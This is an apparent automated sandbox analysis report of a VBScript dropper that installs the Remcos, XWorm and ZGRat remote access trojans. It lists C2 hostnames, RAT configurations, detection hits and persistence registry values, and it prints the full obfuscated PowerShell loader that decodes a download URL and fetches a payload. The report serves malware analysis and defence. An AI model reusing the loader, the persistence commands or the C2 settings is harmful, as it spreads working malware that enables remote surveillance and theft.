remcos | 316aeeea6e73008d96af425abfc23f72a12fe8cf6aa5911687771d81df67aea9

Analysis

max time kernel
359s
max time network
363s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
15-05-2024 03:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

wokay.vbs
Size

16KB
MD5

847bcf90c804edf537de17626836d5a3
SHA1

8e9f21328427f29b89ec50dedc5c32c6edd76a32
SHA256

316aeeea6e73008d96af425abfc23f72a12fe8cf6aa5911687771d81df67aea9
SHA512

d1310c88b531dfbf27b1d83a71ded4b4ef7bc711a071f30ee3842c6abe3e46a9f099373ee26f6f54ac86e2a80662887d39b35d9369aed7c2ad7962b479858138
SSDEEP

192:S+haDKt2b51EVO2nWxX9nlOkCd3XqGM00bquHi0SFfgROb9/jX+krz5ZpLZgVDW:SnKkbd11l3+0bHSFYo3v/pL2W

Score

10^/10

remcos xworm zgrat remotehost execution persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

3.1

xw9402may.duckdns.org:9402

xwormay9090.duckdns.org:9090

Mutex

5w6Cp63r66k4Jxsj

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

remcos

Botnet

RemoteHost

remco8100.duckdns.org:8100

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-G51VNO
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Detect Xworm Payload 2 IoCs

Processes:

resource yara_rule

behavioral2/memory/1932-51-0x0000000000680000-0x000000000068E000-memory.dmp family_xworm
behavioral2/memory/1860-208-0x00000000006F0000-0x00000000006FE000-memory.dmp family_xworm

resource	yara_rule
behavioral2/memory/1932-51-0x0000000000680000-0x000000000068E000-memory.dmp	family_xworm
behavioral2/memory/1860-208-0x00000000006F0000-0x00000000006FE000-memory.dmp	family_xworm

Detect ZGRat V1 16 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1324-221-0x00000000220E0000-0x00000000221BC000-memory.dmp	family_zgrat_v1
behavioral2/memory/1324-237-0x00000000220E0000-0x00000000221B7000-memory.dmp	family_zgrat_v1
behavioral2/memory/1324-251-0x00000000220E0000-0x00000000221B7000-memory.dmp	family_zgrat_v1
behavioral2/memory/1324-249-0x00000000220E0000-0x00000000221B7000-memory.dmp	family_zgrat_v1
behavioral2/memory/1324-247-0x00000000220E0000-0x00000000221B7000-memory.dmp	family_zgrat_v1
behavioral2/memory/1324-245-0x00000000220E0000-0x00000000221B7000-memory.dmp	family_zgrat_v1
behavioral2/memory/1324-243-0x00000000220E0000-0x00000000221B7000-memory.dmp	family_zgrat_v1
behavioral2/memory/1324-241-0x00000000220E0000-0x00000000221B7000-memory.dmp	family_zgrat_v1
behavioral2/memory/1324-239-0x00000000220E0000-0x00000000221B7000-memory.dmp	family_zgrat_v1
behavioral2/memory/1324-235-0x00000000220E0000-0x00000000221B7000-memory.dmp	family_zgrat_v1
behavioral2/memory/1324-233-0x00000000220E0000-0x00000000221B7000-memory.dmp	family_zgrat_v1
behavioral2/memory/1324-231-0x00000000220E0000-0x00000000221B7000-memory.dmp	family_zgrat_v1
behavioral2/memory/1324-227-0x00000000220E0000-0x00000000221B7000-memory.dmp	family_zgrat_v1
behavioral2/memory/1324-225-0x00000000220E0000-0x00000000221B7000-memory.dmp	family_zgrat_v1
behavioral2/memory/1324-229-0x00000000220E0000-0x00000000221B7000-memory.dmp	family_zgrat_v1
behavioral2/memory/1324-224-0x00000000220E0000-0x00000000221B7000-memory.dmp	family_zgrat_v1

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Blocklisted process makes network request 47 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
27	4684	powershell.exe
75	3716	powershell.exe
77	832	powershell.exe
78	4944	powershell.exe
79	2952	powershell.exe
105	6540	powershell.exe
108	6540	powershell.exe
109	6540	powershell.exe
110	6540	powershell.exe
115	6540	powershell.exe
117	6540	powershell.exe
118	6540	powershell.exe
119	6540	powershell.exe
120	6540	powershell.exe
121	6540	powershell.exe
122	6540	powershell.exe
123	6540	powershell.exe
124	6540	powershell.exe
125	6540	powershell.exe
126	6540	powershell.exe
127	6540	powershell.exe
128	6540	powershell.exe
129	6540	powershell.exe
130	6540	powershell.exe
131	6540	powershell.exe
132	6540	powershell.exe
133	6540	powershell.exe
134	6540	powershell.exe
135	6540	powershell.exe
136	6540	powershell.exe
137	6540	powershell.exe
138	6540	powershell.exe
139	6540	powershell.exe
140	6540	powershell.exe
141	6540	powershell.exe
142	6540	powershell.exe
143	6540	powershell.exe
144	6540	powershell.exe
145	6540	powershell.exe
146	6540	powershell.exe
147	6540	powershell.exe
153	6540	powershell.exe
154	6540	powershell.exe
155	6540	powershell.exe
156	6540	powershell.exe
157	6540	powershell.exe
158	6540	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

3716 powershell.exe
6540 powershell.exe
7124 powershell.exe

pid	process
3716	powershell.exe
6540	powershell.exe
7124	powershell.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeWScript.exeWScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Transplantationen% -w 1 $Honnrmarchs=(Get-ItemProperty -Path 'HKCU:\\Leadenpated\\').Jugoslavere;%Transplantationen% ($Honnrmarchs)"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Hjrecentrere = "%Ibsenism% -w 1 $Fdrenegaarde=(Get-ItemProperty -Path 'HKCU:\\Latherability\\').Perdit;%Ibsenism% ($Fdrenegaarde)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 5 IoCs

Processes:

wab.exewab.exewab.exewab.exewab.exe

pid process

1932 wab.exe
1840 wab.exe
2840 wab.exe
1860 wab.exe
1324 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs

Processes:

powershell.exewab.exepowershell.exewab.exepowershell.exepowershell.exewab.exepowershell.exewab.exewab.exepowershell.exewab.exewab.exe

pid process

3472 powershell.exe
1932 wab.exe
5016 powershell.exe
1840 wab.exe
4144 powershell.exe
4008 powershell.exe
2840 wab.exe
776 powershell.exe
1860 wab.exe
1324 wab.exe
7124 powershell.exe
3436 wab.exe
6828 wab.exe

pid	process
1932	wab.exe
1840	wab.exe
2840	wab.exe
1860	wab.exe
1324	wab.exe

pid	process
3472	powershell.exe
1932	wab.exe
5016	powershell.exe
1840	wab.exe
4144	powershell.exe
4008	powershell.exe
2840	wab.exe
776	powershell.exe
1860	wab.exe
1324	wab.exe
7124	powershell.exe
3436	wab.exe
6828	wab.exe

Suspicious use of SetThreadContext 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exewab.exe

description	pid	process	target process
PID 3472 set thread context of 1932	3472	powershell.exe	wab.exe
PID 5016 set thread context of 1840	5016	powershell.exe	wab.exe
PID 4144 set thread context of 2840	4144	powershell.exe	wab.exe
PID 4008 set thread context of 1860	4008	powershell.exe	wab.exe
PID 776 set thread context of 1324	776	powershell.exe	wab.exe
PID 7124 set thread context of 3436	7124	powershell.exe	wab.exe
PID 3436 set thread context of 6828	3436	wab.exe	wab.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

6860 6828 WerFault.exe wab.exe
2676 3436 WerFault.exe wab.exe
Modifies registry class 1 IoCs

Processes:

wab.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings wab.exe
Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

5112 reg.exe
1456 reg.exe

pid	pid_target	process	target process
6860	6828	WerFault.exe	wab.exe
2676	3436	WerFault.exe	wab.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings	wab.exe

pid	process
5112	reg.exe
1456	reg.exe

Suspicious behavior: EnumeratesProcesses 38 IoCs

Processes:

powershell.exepowershell.exewab.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exewab.exepowershell.exepowershell.exe

pid	process
4684	powershell.exe
4684	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
1932	wab.exe
3716	powershell.exe
3716	powershell.exe
832	powershell.exe
832	powershell.exe
4944	powershell.exe
4944	powershell.exe
2952	powershell.exe
2952	powershell.exe
2952	powershell.exe
5016	powershell.exe
5016	powershell.exe
5016	powershell.exe
5016	powershell.exe
4144	powershell.exe
4144	powershell.exe
4144	powershell.exe
4008	powershell.exe
4008	powershell.exe
4008	powershell.exe
776	powershell.exe
776	powershell.exe
776	powershell.exe
4144	powershell.exe
4008	powershell.exe
776	powershell.exe
1860	wab.exe
6540	powershell.exe
6540	powershell.exe
7124	powershell.exe
7124	powershell.exe
7124	powershell.exe

Suspicious behavior: MapViewOfSection 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exewab.exe

pid process

3472 powershell.exe
5016 powershell.exe
4144 powershell.exe
4008 powershell.exe
776 powershell.exe
7124 powershell.exe
3436 wab.exe

pid	process
3472	powershell.exe
5016	powershell.exe
4144	powershell.exe
4008	powershell.exe
776	powershell.exe
7124	powershell.exe
3436	wab.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

Processes:

powershell.exepowershell.exewab.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exewab.exewab.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4684	powershell.exe
Token: SeDebugPrivilege	3472	powershell.exe
Token: SeDebugPrivilege	1932	wab.exe
Token: SeDebugPrivilege	3716	powershell.exe
Token: SeDebugPrivilege	832	powershell.exe
Token: SeDebugPrivilege	4944	powershell.exe
Token: SeDebugPrivilege	2952	powershell.exe
Token: SeDebugPrivilege	5016	powershell.exe
Token: SeDebugPrivilege	4144	powershell.exe
Token: SeDebugPrivilege	4008	powershell.exe
Token: SeDebugPrivilege	776	powershell.exe
Token: SeDebugPrivilege	1860	wab.exe
Token: SeDebugPrivilege	1324	wab.exe
Token: SeDebugPrivilege	6540	powershell.exe
Token: SeDebugPrivilege	7124	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

wab.exewab.exewab.exe

pid process

1932 wab.exe
1840 wab.exe
1860 wab.exe

pid	process
1932	wab.exe
1840	wab.exe
1860	wab.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.exepowershell.exepowershell.exewab.execmd.execmd.exepowershell.exeWScript.exeWScript.exepowershell.exeWScript.exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 3852 wrote to memory of 4684	3852	WScript.exe	powershell.exe
PID 3852 wrote to memory of 4684	3852	WScript.exe	powershell.exe
PID 4684 wrote to memory of 1184	4684	powershell.exe	cmd.exe
PID 4684 wrote to memory of 1184	4684	powershell.exe	cmd.exe
PID 4684 wrote to memory of 3472	4684	powershell.exe	powershell.exe
PID 4684 wrote to memory of 3472	4684	powershell.exe	powershell.exe
PID 4684 wrote to memory of 3472	4684	powershell.exe	powershell.exe
PID 3472 wrote to memory of 1540	3472	powershell.exe	cmd.exe
PID 3472 wrote to memory of 1540	3472	powershell.exe	cmd.exe
PID 3472 wrote to memory of 1540	3472	powershell.exe	cmd.exe
PID 3472 wrote to memory of 1932	3472	powershell.exe	wab.exe
PID 3472 wrote to memory of 1932	3472	powershell.exe	wab.exe
PID 3472 wrote to memory of 1932	3472	powershell.exe	wab.exe
PID 3472 wrote to memory of 1932	3472	powershell.exe	wab.exe
PID 3472 wrote to memory of 1932	3472	powershell.exe	wab.exe
PID 1932 wrote to memory of 5108	1932	wab.exe	cmd.exe
PID 1932 wrote to memory of 5108	1932	wab.exe	cmd.exe
PID 1932 wrote to memory of 5108	1932	wab.exe	cmd.exe
PID 5108 wrote to memory of 5112	5108	cmd.exe	reg.exe
PID 5108 wrote to memory of 5112	5108	cmd.exe	reg.exe
PID 5108 wrote to memory of 5112	5108	cmd.exe	reg.exe
PID 1932 wrote to memory of 4540	1932	wab.exe	WScript.exe
PID 1932 wrote to memory of 4540	1932	wab.exe	WScript.exe
PID 1932 wrote to memory of 4540	1932	wab.exe	WScript.exe
PID 1932 wrote to memory of 2400	1932	wab.exe	WScript.exe
PID 1932 wrote to memory of 2400	1932	wab.exe	WScript.exe
PID 1932 wrote to memory of 2400	1932	wab.exe	WScript.exe
PID 1932 wrote to memory of 3188	1932	wab.exe	cmd.exe
PID 1932 wrote to memory of 3188	1932	wab.exe	cmd.exe
PID 1932 wrote to memory of 3188	1932	wab.exe	cmd.exe
PID 3188 wrote to memory of 3716	3188	cmd.exe	powershell.exe
PID 3188 wrote to memory of 3716	3188	cmd.exe	powershell.exe
PID 3188 wrote to memory of 3716	3188	cmd.exe	powershell.exe
PID 1932 wrote to memory of 1884	1932	wab.exe	WScript.exe
PID 1932 wrote to memory of 1884	1932	wab.exe	WScript.exe
PID 1932 wrote to memory of 1884	1932	wab.exe	WScript.exe
PID 3716 wrote to memory of 2704	3716	powershell.exe	cmd.exe
PID 3716 wrote to memory of 2704	3716	powershell.exe	cmd.exe
PID 3716 wrote to memory of 2704	3716	powershell.exe	cmd.exe
PID 4540 wrote to memory of 832	4540	WScript.exe	powershell.exe
PID 4540 wrote to memory of 832	4540	WScript.exe	powershell.exe
PID 4540 wrote to memory of 832	4540	WScript.exe	powershell.exe
PID 2400 wrote to memory of 4944	2400	WScript.exe	powershell.exe
PID 2400 wrote to memory of 4944	2400	WScript.exe	powershell.exe
PID 2400 wrote to memory of 4944	2400	WScript.exe	powershell.exe
PID 832 wrote to memory of 1844	832	powershell.exe	cmd.exe
PID 832 wrote to memory of 1844	832	powershell.exe	cmd.exe
PID 832 wrote to memory of 1844	832	powershell.exe	cmd.exe
PID 1884 wrote to memory of 2952	1884	WScript.exe	powershell.exe
PID 1884 wrote to memory of 2952	1884	WScript.exe	powershell.exe
PID 1884 wrote to memory of 2952	1884	WScript.exe	powershell.exe
PID 3716 wrote to memory of 5016	3716	powershell.exe	powershell.exe
PID 3716 wrote to memory of 5016	3716	powershell.exe	powershell.exe
PID 3716 wrote to memory of 5016	3716	powershell.exe	powershell.exe
PID 4944 wrote to memory of 4048	4944	powershell.exe	cmd.exe
PID 4944 wrote to memory of 4048	4944	powershell.exe	cmd.exe
PID 4944 wrote to memory of 4048	4944	powershell.exe	cmd.exe
PID 2952 wrote to memory of 4920	2952	powershell.exe	cmd.exe
PID 2952 wrote to memory of 4920	2952	powershell.exe	cmd.exe
PID 2952 wrote to memory of 4920	2952	powershell.exe	cmd.exe
PID 5016 wrote to memory of 776	5016	powershell.exe	cmd.exe
PID 5016 wrote to memory of 776	5016	powershell.exe	cmd.exe
PID 5016 wrote to memory of 776	5016	powershell.exe	cmd.exe
PID 4944 wrote to memory of 4144	4944	powershell.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\wokay.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3852

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Komtessesnstills = 1;$Kommunismes='Su';$Kommunismes+='bstrin';$Kommunismes+='g';Function Toxicarol($redeemable){$Monarkisternes=$redeemable.Length-$Komtessesnstills;For($Komtesses=5;$Komtesses -lt $Monarkisternes;$Komtesses+=6){$Isblokkene+=$redeemable.$Kommunismes.Invoke( $Komtesses, $Komtessesnstills);}$Isblokkene;}function Everlastingness($Forstrkende){& ($Surmenage) ($Forstrkende);}$Aktivest=Toxicarol 'Vas uM c,mioRelatz.largi Beccl autlMed.iaTract/Econo5Overd.Flage0 Silk Heste(,vitiWForu,i CitrnSopord rackoM,lodwSenn sForvi StammNunintT Prig Mekan1 Nedb0lnniv.A.phi0Landb;Ribos HelioWNoneqiE.silnIndka6 Vold4 Po,v;Karto LnenexW.rsz6 Vege4Dow,o;Bolig Stadhr Poinv oler:Metap1embal2 Geof1Predi.Coffi0Knirk)Lsepu ClutGUnecleDgnrycBrea.kT.lepoHudde/ pred2Taber0Marke1.lood0F,sen0 Deak1sygem0Salre1Strow BolthFAlderi,nsucrSl ppeLoqsefDile,ononfaxNeopl/Entit1Ho.po2 Se i1Sprin.Deser0Hangm ';$Lozenger=Toxicarol ' onrhUInadksAffrieTrisur No,a-Prec ASelskgCompieVand,n Fo,ltKompl ';$Reembraced=Toxicarol 'TrykkhOveratVestatLuedep Si.nsSyg.d: Eng./blath/Gu,bujEin toScrubcSaalscAcrotuFledgpMote aHexamtFor.oiS.emsoTerrin,armoa,oundlBran.s TyfocBerl iStrukeChem,n PulvcUpgrae Acet. ,erooContarskr.agF ame/Seisod Husef Gero/ MarkKMilito Mar gStarneBramsk V riuSpildn StelsTe retFejlbe CollrCop l.O,cilxTe.nasSmaasnContr ';$Balser=Toxicarol 'Spatc>Perma ';$Surmenage=Toxicarol 'IndgaiHu kieGawaixLgebe ';$Udtyndingszoner='Blgemekanikkernes';Everlastingness (Toxicarol ' opulSBran.e Be,ztArmig-DesmeCRigoroBreadnReembtWashheBa,tinknocktFarno Hysso-HverdPRundea,itertParolhUdfrd lftebTForeb:Erl g\Sur sTFunklaKap,ncI.truhPrisfoDiskfgRygrar KyklaC ntim.mkra.Le,sitDokumxRotertFyrf Rosma-Tan iVPanmiaRoll lPerniuAssegeTenon Rebel$ GlidU EkspdIntrotTekstyRidden Tid dFirmaiAffrinSkjulgLapi sDeterzForm.o nconn Flute ngorrdrags; .ets ');Everlastingness (Toxicarol 'TornyiYmcaafcrema Myric(Mildrt Bonee StrisGalactHemo - UmbrpLooneaCottatPreach Fu,n UopsiTMe ol:Ov.rs\S,andT.ooksaAfbryc,ammehRaftsoUmoragS olir PropaRamlemPushe.TorskteksprxPhysitBebat)Scint{StraweFiercxHydroiStarettick }Broka; utla ');$Knalleristens = Toxicarol 'RevisePret,cBlan hBaciloColli okku%DrachaBlancpLantepIsochdUdkomaAvanct,ecreaKbetv%Fremt\Ekst.D ,nheeDairid LadldEx,ncyBuild.NotchDLimico L,rigNig.r .nkha&Ableg&Jussi NondeAuthoc He,nhHimmeosa,gf Vrede$Boili ';Everlastingness (Toxicarol 'Pramd$CoquegSa.relRangfoKonfebN tteaSanktlN,cro:Kun,eSSign.t Treeo RecirRectilMe,taiData nLeuciiRespieSwimmtPsych=Bajon( Ma lcudbudmEmascdIlten Trnin/BummlcSuper Con $SouthK CooknBu.keaBl,kblSuccolSkideetapperEld eiFeazis ne ttResere Unesn TestsTenon) Blin ');Everlastingness (Toxicarol 'Doppe$bill gAkenolUnruioHolomb.heliaQui cl Udpo:blomkFUnriplGte kkLseglkconsteProl rGri,dnEthoxeCalen9Na.sk0Trenc=organ$ OffsR OvereHkkeoe .orhm spidb,lumpr ,melaBughocYder eDrejedIndop.Ph,nosBac,ep VerdlMon hi,anictDegne( Regi$fordlBAlfeda ReuplU,anasConopeSno.arKlage)Barbe ');$Reembraced=$Flkkerne90[0];Everlastingness (Toxicarol 'Tomle$UnstugMasselByplaoReprybP.oceaBe.allBo,bl:TypisXcut,vaBack.nRh.tatU,inth,ustsi SkinpAfru pStorteEra irSpytknViruleDenats oode=Te,reNAiluretem owStrin- AuroOSadisbNeurojInt,reCiv.lcHund t Magi BinfuS .usty MonosRodtetEndote Kom,mPrang.StnskNOutwieHammet Krys.fo,anW UdtyeRe,libRagliCArgenlAp.eli S.rieAp.rsnShowmtCy,nu ');Everlastingness (Toxicarol 'Udsej$SemirXal uva ousenSkabetBeatlh RetsipanthpFilstpResu eMac orRet,inEscale Capas Sven.MahjoHAlb cevend,aSikkedSkamseEnocyrAlle sSin,e[Montm$svmm,LmicrooChrisz Kap.eForudn s sogArb,je.atherfireo]Anapn=.xcen$.loamAbrugekUd,rit Ekspi.negivCam se H.lssDorsotUneve ');$Delflgens=Toxicarol 'undesXQurtiaOpdelnHespetInvalhpastoiEnergpDaarepStraneInhomrSti nnGan.eeFidelsA.hol.HenlgDSund,o u,arwRabien Overlriseno Mo eaDih,ddWort,FPolytiGaslol PacoeCover(E,ter$ ygnRPerspeTrevleNonnamReglebCh.tir Upsta,rettc rogre Antid Solo,Svejs$.subaB H,rnaLimonbResiseAsymtrDiassyRough) Over ';$Delflgens=$Storliniet[1]+$Delflgens;$Babery=$Storliniet[0];Everlastingness (Toxicarol 'An.gn$FnomegDokumlAalegoDown,bDagtiaHockelAtmos:PlasmDAut eiCrenacB,stihBlinkr TrstoMu chmatomiaP rcetMis.riTetracOssic=Coeta( AbonTHipsheklicksTranstunde,- ApogP,ippla SedutUligeh.ndtg Spids$AnalyBNitteagavekbHoodweLo,kirFacilyRaunc)Decor ');while (!$Dichromatic) {Everlastingness (Toxicarol 'Varia$BentogautoslDiadeo Ski bInc,ma Nonpl Joce: Sah.bbrandaammonaFlaglnTaxeadPolitvDuettvNewsreSatisnPylor=Theol$GeledtefterrProveuIngele ,jty ') ;Everlastingness $Delflgens;Everlastingness (Toxicarol 'VicarSCota,tErhveaAngrerbaktettiara-FyrtjS Counl ,leceAnb,feTrymap Acin T,ldb4Erthe ');Everlastingness (Toxicarol 'Ustil$ Tredg sildlTransod.skobSq.amaMydi,lPremu:Fe.skDSka,tiGasmaccassohS irirReleno pgramDesmoaIm,retS.periLy.rrcNonco= Krte(,rdsaTSprineDolces RetutBonm -InviaP LauraHarmatIlli,hSekit T.ion$ RoseBVintaaFlywhbOut.ie UralrLeaksyPanda)V.kar ') ;Everlastingness (Toxicarol 'den,i$,oublgFrperlplastoMu enb SmldamalcolSvige: Buk BTumbleVaticsPrdikkoutgayChartlEumerdMakken.mklaiSidevnIntelgPlaste Teutrunapp= With$VisaggOm.krlformyoTroldb auctaSolbrl,ryds: Ran,RHavn,a.lovnjTndstaObs,rb F ll+Orato+ Rati% Kula$Joks F A,yslGeni,k Rawlk pideBinokr C.ncnO.taee Unto9P.lar0Catal.RntgecKingboSandhuTeamwnAfkrvtAutog ') ;$Reembraced=$Flkkerne90[$Beskyldninger];}$Fortrdeligt=276508;$Elzevir=28490;Everlastingness (Toxicarol 'Skal.$ForhagReserl Bri oJeho,bBayadaFastflVgtfy:IngelDSuperi U.povAdveriIncons MilliThromoBetalnNa ursscamms ortytIrrenylib,lkF.arekpaarreA.klarRaffi Arc d=Cours LettiGUdskeeParamtReser-pre.sC Pr doBetonnNyctat.lideeLeuk,nSwit.tT,ien Fedt,$ virkBAlodiaGennebCrysteSp tnrHvledy C,sp ');Everlastingness (Toxicarol 'guine$Bortgg,drjelFernbo BvrebMdeafaBist,lU tra: PikaAM crot carbr Unr,oMorarpRee baEskadl Lngd G.ne=Gnocc Rais[OccipSEu,ogyGenn.sTra stSp nseOdourmBegyn. PorgCcunoioErg tnun nivUtraqe t.llr U,antCo,fi]Skatt:Baiss:M,ndaF.dofirkioskoBegynmSafiaB E shaTrawlsMal,tesuccu6 Disp4Lux mSNoctut .onorAnkeriRuskenPorthgCuvie(Riegg$AnhunD Filli Ratlv Metri,ackjsrhodoiSa,ono BekvnSup.rsDinossProc.tNonpeyMo,stkPs,rikKhedieEnounrM.net)impr. ');Everlastingness (Toxicarol 'Is,cy$,ispagMagmalPiacuoEmendbAutoeaBenvalPlopp:FlnsnFunderdAfstuesupervBarnaaDoctorPy.tee FurfgUnnomiRelapgLiteraSgninn strit.rodueNummen N.ndsBehnd Forz.=Ansva Hydr.[Su.erSGrabbyEntoms En etdupl e,ozjim Quin.SmagsTBebopeByggexBedmmtOligu.HelleE F.benTurnecAbciso ketcdAmy,oiSubwanEksorgAngos]Plott:Ende.: TerrABar,eSAb,ecC EvapIAmanuI Bore.DenerGG.likeSinditBe geSNedkrt Cr srRebooiDatasnto.chgFr mm(Conti$Stud.ATullit orserNaaleokit,bpU,veraZinkklFrste) Nota ');Everlastingness (Toxicarol 'Absci$ByplagKate.lLogaro Barib unloaMensalEnkel:,estiDSoleneMonisw .ammcOrakzlTentiaTi,uswDesc sJackw=H,sto$BestrFB,urpdBlindeDiplov Che.a skibrKoftee,odskg BygaiFormagTosidaNeddynDesigtAfgifeAfhjen placsKostu. EpicsSat uuVivipbEgenasVolustBlodkrVocabiDisv,n salagNonpu(Nidor$ValinFStbeno gemirS multBlastr.rimid .isseLandsl.unnii Sinkgs.vtjtPostt, Nons$Cinc,E Bridl te.rzC.arlebe.davba.thiInconr T.rn)coffi ');Everlastingness $Dewclaws;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4684

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Deddy.Dog && echo $"
3⤵
PID:1184

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Komtessesnstills = 1;$Kommunismes='Su';$Kommunismes+='bstrin';$Kommunismes+='g';Function Toxicarol($redeemable){$Monarkisternes=$redeemable.Length-$Komtessesnstills;For($Komtesses=5;$Komtesses -lt $Monarkisternes;$Komtesses+=6){$Isblokkene+=$redeemable.$Kommunismes.Invoke( $Komtesses, $Komtessesnstills);}$Isblokkene;}function Everlastingness($Forstrkende){& ($Surmenage) ($Forstrkende);}$Aktivest=Toxicarol 'Vas uM c,mioRelatz.largi Beccl autlMed.iaTract/Econo5Overd.Flage0 Silk Heste(,vitiWForu,i CitrnSopord rackoM,lodwSenn sForvi StammNunintT Prig Mekan1 Nedb0lnniv.A.phi0Landb;Ribos HelioWNoneqiE.silnIndka6 Vold4 Po,v;Karto LnenexW.rsz6 Vege4Dow,o;Bolig Stadhr Poinv oler:Metap1embal2 Geof1Predi.Coffi0Knirk)Lsepu ClutGUnecleDgnrycBrea.kT.lepoHudde/ pred2Taber0Marke1.lood0F,sen0 Deak1sygem0Salre1Strow BolthFAlderi,nsucrSl ppeLoqsefDile,ononfaxNeopl/Entit1Ho.po2 Se i1Sprin.Deser0Hangm ';$Lozenger=Toxicarol ' onrhUInadksAffrieTrisur No,a-Prec ASelskgCompieVand,n Fo,ltKompl ';$Reembraced=Toxicarol 'TrykkhOveratVestatLuedep Si.nsSyg.d: Eng./blath/Gu,bujEin toScrubcSaalscAcrotuFledgpMote aHexamtFor.oiS.emsoTerrin,armoa,oundlBran.s TyfocBerl iStrukeChem,n PulvcUpgrae Acet. ,erooContarskr.agF ame/Seisod Husef Gero/ MarkKMilito Mar gStarneBramsk V riuSpildn StelsTe retFejlbe CollrCop l.O,cilxTe.nasSmaasnContr ';$Balser=Toxicarol 'Spatc>Perma ';$Surmenage=Toxicarol 'IndgaiHu kieGawaixLgebe ';$Udtyndingszoner='Blgemekanikkernes';Everlastingness (Toxicarol ' opulSBran.e Be,ztArmig-DesmeCRigoroBreadnReembtWashheBa,tinknocktFarno Hysso-HverdPRundea,itertParolhUdfrd lftebTForeb:Erl g\Sur sTFunklaKap,ncI.truhPrisfoDiskfgRygrar KyklaC ntim.mkra.Le,sitDokumxRotertFyrf Rosma-Tan iVPanmiaRoll lPerniuAssegeTenon Rebel$ GlidU EkspdIntrotTekstyRidden Tid dFirmaiAffrinSkjulgLapi sDeterzForm.o nconn Flute ngorrdrags; .ets ');Everlastingness (Toxicarol 'TornyiYmcaafcrema Myric(Mildrt Bonee StrisGalactHemo - UmbrpLooneaCottatPreach Fu,n UopsiTMe ol:Ov.rs\S,andT.ooksaAfbryc,ammehRaftsoUmoragS olir PropaRamlemPushe.TorskteksprxPhysitBebat)Scint{StraweFiercxHydroiStarettick }Broka; utla ');$Knalleristens = Toxicarol 'RevisePret,cBlan hBaciloColli okku%DrachaBlancpLantepIsochdUdkomaAvanct,ecreaKbetv%Fremt\Ekst.D ,nheeDairid LadldEx,ncyBuild.NotchDLimico 